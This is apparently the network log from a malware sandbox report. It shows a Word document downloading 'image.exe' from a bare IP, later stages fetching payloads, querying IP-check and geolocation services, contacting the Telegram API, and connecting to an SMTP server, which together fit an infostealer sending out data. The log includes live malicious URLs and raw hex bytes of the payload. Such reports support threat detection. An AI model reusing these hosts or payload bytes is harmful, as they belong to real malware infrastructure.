                                                                                                                                          Jan 6, 2025 07:54:51.769885063 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.770844936 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.775741100 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.917784929 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.918025017 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.922885895 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.064421892 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.064676046 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.069574118 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.211771011 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.212028027 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.216856956 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.360187054 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.360775948 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.365513086 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.508322954 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.508671045 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.513513088 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.669486046 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.673171997 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.673224926 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.673243999 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.673243999 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.677975893 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.678097963 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.678141117 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.915534019 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.959860086 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:55:06.184756994 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:56:12.492094994 CET53704587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:12.496943951 CET58753704208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:12.642179966 CET58753704208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:12.642626047 CET53704587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:12.647710085 CET58753704208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:12.647784948 CET53704587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:23.195144892 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:23.200345993 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:23.342118025 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:23.342642069 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:23.347630024 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:23.347687006 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:30.335822105 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:30.340730906 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:30.482259035 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:30.485795975 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:30.490873098 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:30.491432905 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 6, 2025 07:54:04.451196909 CET5784353192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:04.465109110 CET53578431.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:10.967629910 CET6435553192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET53643551.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:12.866058111 CET6296953192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:12.872827053 CET53629691.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:16.250803947 CET53505241.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:24.947267056 CET5476153192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:24.953825951 CET53547611.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:32.465090990 CET5909653192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:32.779500961 CET53590961.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 07:54:04.451196909 CET | 192.168.2.5 | 1.1.1.1 | 0x9962 | Standard query (0) | amazonenviro.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:10.967629910 CET | 192.168.2.5 | 1.1.1.1 | 0x9c73 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:12.866058111 CET | 192.168.2.5 | 1.1.1.1 | 0x987 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:24.947267056 CET | 192.168.2.5 | 1.1.1.1 | 0xf408 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:32.465090990 CET | 192.168.2.5 | 1.1.1.1 | 0x8f7b | Standard query (0) | mail.techniqueqatar.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 07:54:04.465109110 CET | 1.1.1.1 | 192.168.2.5 | 0x9962 | No error (0) | amazonenviro.com | - | 166.62.27.188 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:10.974785089 CET | 1.1.1.1 | 192.168.2.5 | 0x9c73 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 07:54:10.974785089 CET | 1.1.1.1 | 192.168.2.5 | 0x9c73 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:10.974785089 CET | 1.1.1.1 | 192.168.2.5 | 0x9c73 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:10.974785089 CET | 1.1.1.1 | 192.168.2.5 | 0x9c73 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:10.974785089 CET | 1.1.1.1 | 192.168.2.5 | 0x9c73 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:10.974785089 CET | 1.1.1.1 | 192.168.2.5 | 0x9c73 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:12.872827053 CET | 1.1.1.1 | 192.168.2.5 | 0x987 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:12.872827053 CET | 1.1.1.1 | 192.168.2.5 | 0x987 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:24.953825951 CET | 1.1.1.1 | 192.168.2.5 | 0xf408 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:54:32.779500961 CET | 1.1.1.1 | 192.168.2.5 | 0x8f7b | No error (0) | mail.techniqueqatar.com | - | 208.91.198.176 | A (IP address) | IN (0x0001) | false
                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                          • api.telegram.org
                                                                                                                                          • 147.124.216.113
                                                                                                                                          • amazonenviro.com
                                                                                                                                          • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 147.124.216.113 | 80 | 3732 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:54:02.020010948 CET | 182 | OUT | GET /image.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-ch
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 147.124.216.113
Jan 6, 2025 07:54:02.539633989 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Sun, 05 Jan 2025 22:54:23 GMT
Accept-Ranges: bytes
ETag: "185c71c3c45fdb1:0"
Server: Microsoft-IIS/8.5
Date: Mon, 06 Jan 2025 06:54:02 GMT
Content-Length: 1161216
                                                                                                                                          Jan 6, 2025 07:54:02.578353882 CET1236INData Raw: d8 07 fe ff ff 85 f8 47 fe ff 8b c3 e8 1e fa ff ff 8b d8 85 db 75 8e 8b 7f 04 81 ff 08 17 47 00 0f 85 72 ff ff ff 8b 1d b0 37 47 00 eb 37 8b c3 83 c0 10 e8 5f fd ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8
                                                                                                                                          Data Ascii: GuGr7G7_u&GsGG[7GtG|GXG3G)@(AG7G>FOGGGGG
                                                                                                                                          Jan 6, 2025 07:54:02.578363895 CET448INData Raw: e8 da fe ff ff c7 05 08 17 47 00 08 17 47 00 c7 05 0c 17 47 00 08 17 47 00 be 00 04 00 00 ba a8 17 47 00 8b c2 89 00 89 40 04 83 c2 08 4e 75 f3 c7 05 ac 37 47 00 ac 37 47 00 c7 05 b0 37 47 00 ac 37 47 00 5f 5e 5b c3 8d 40 00 53 56 57 55 bb 08 17
                                                                                                                                          Data Ascii: GGGGG@Nu7G7G7G7G_^[@SVWUG7G{ohjW;u7<FHH@3H Ju[G@Ju^{hjS(;u6v]_^[=7Gt7GP3
                                                                                                                                          Jan 6, 2025 07:54:02.578506947 CET1236INData Raw: 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 67 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 59 3a 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 47 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 39 3a 00 00 8b 80 00 00 00 00 8b 40 04 c3 33 c0 c3 53 56 e8 25 3a 00 00
                                                                                                                                          Data Ascii: Yt@g:tY:@3G:t9:@3SV%:t:^:3F3^[@FSV=GtGu9w4F^[@$PRQ9Y
                                                                                                                                          Jan 6, 2025 07:54:02.578519106 CET1236INData Raw: da dd 14 02 dd 54 02 08 83 c2 10 7c f4 dd c0 c3 90 90 90 85 d2 7e 50 88 4c 02 ff 83 e2 fe f7 da 8d 14 55 80 32 40 00 ff e2 90 90 66 89 48 1c 66 89 48 1a 66 89 48 18 66 89 48 16 66 89 48 14 66 89 48 12 66 89 48 10 66 89 48 0e 66 89 48 0c 66 89 48
                                                                                                                                          Data Ascii: T|~PLU2@fHfHfHfHfHfHfHfHfHfHfHfHfHfHf@SVWPtl11F t-tb+t_$t_xtZXtU0uFxtHXtCt t-0w%9w!Fut}TF~KxI[)G
                                                                                                                                          Jan 6, 2025 07:54:02.578531027 CET1236INData Raw: 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 60 37 40 00 8b 45 fc 50 e8 fe db ff ff 33 c0 5a 59 59 64 89 10 68 24 37 40 00 8b 45 fc 50 e8 d8 db ff ff c3 e9 06 09 00 00 eb ef 0f b7 05 20 f0 46 00 66 25 c0 ff 0f b7 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 f0 46
                                                                                                                                          Data Ascii: EPEPjjh`7@EP3ZYYdh$7@EP Ff%Uf?ff F]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- FVWp1A_^@USV3M3Uh'8@d0d E


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49713        166.62.27.188   80                5560  C:\Windows\SysWOW64\brightness.exe
Timestamp  Bytes transferred  Direction  Data
Jan 6, 2025 07:54:04.514368057 CET  165  OUT  GET /245_Aiymwhpjxsg HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                          Host: amazonenviro.com
Jan 6, 2025 07:54:05.433335066 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:05 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade, Keep-Alive
                                                                                                                                          Last-Modified: Sun, 05 Jan 2025 22:51:37 GMT
                                                                                                                                          ETag: "2ca99af-bf3d0-62afd5ac0f2a3"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 783312
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Keep-Alive: timeout=5


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49723        132.226.8.169   80                7208  C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp  Bytes transferred  Direction  Data
Jan 6, 2025 07:54:10.990698099 CET  151  OUT  GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
Jan 6, 2025 07:54:11.775665998 CET  273  IN  HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:54:11.818860054 CET  127  OUT  GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
Jan 6, 2025 07:54:12.103647947 CET  273  IN  HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:54:13.717377901 CET  127  OUT  GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
Jan 6, 2025 07:54:13.988286972 CET  273  IN  HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49731        132.226.8.169   80                7208  C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp  Bytes transferred  Direction  Data
Jan 6, 2025 07:54:14.624490023 CET  127  OUT  GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
Jan 6, 2025 07:54:15.370594025 CET  273  IN  HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:15 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  49736        132.226.8.169   80                7208  C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp  Bytes transferred  Direction  Data
Jan 6, 2025 07:54:15.988140106 CET  127  OUT  GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
Jan 6, 2025 07:54:16.802356958 CET  273  IN  HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          5 | 192.168.2.5 | 53584 | 132.226.8.169 | 80 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:17.503892899 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:18.455593109 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:18 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          6 | 192.168.2.5 | 53597 | 132.226.8.169 | 80 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:19.068025112 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:19.847596884 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          7 | 192.168.2.5 | 53606 | 132.226.8.169 | 80 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:20.643907070 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:21.500524044 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:21 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          8 | 192.168.2.5 | 53618 | 132.226.8.169 | 80 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:22.127638102 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:22.889813900 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          9 | 192.168.2.5 | 53623 | 132.226.8.169 | 80 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Jan 6, 2025 07:54:22.610833883 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:23.538500071 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:23.569864988 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:23.837054014 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
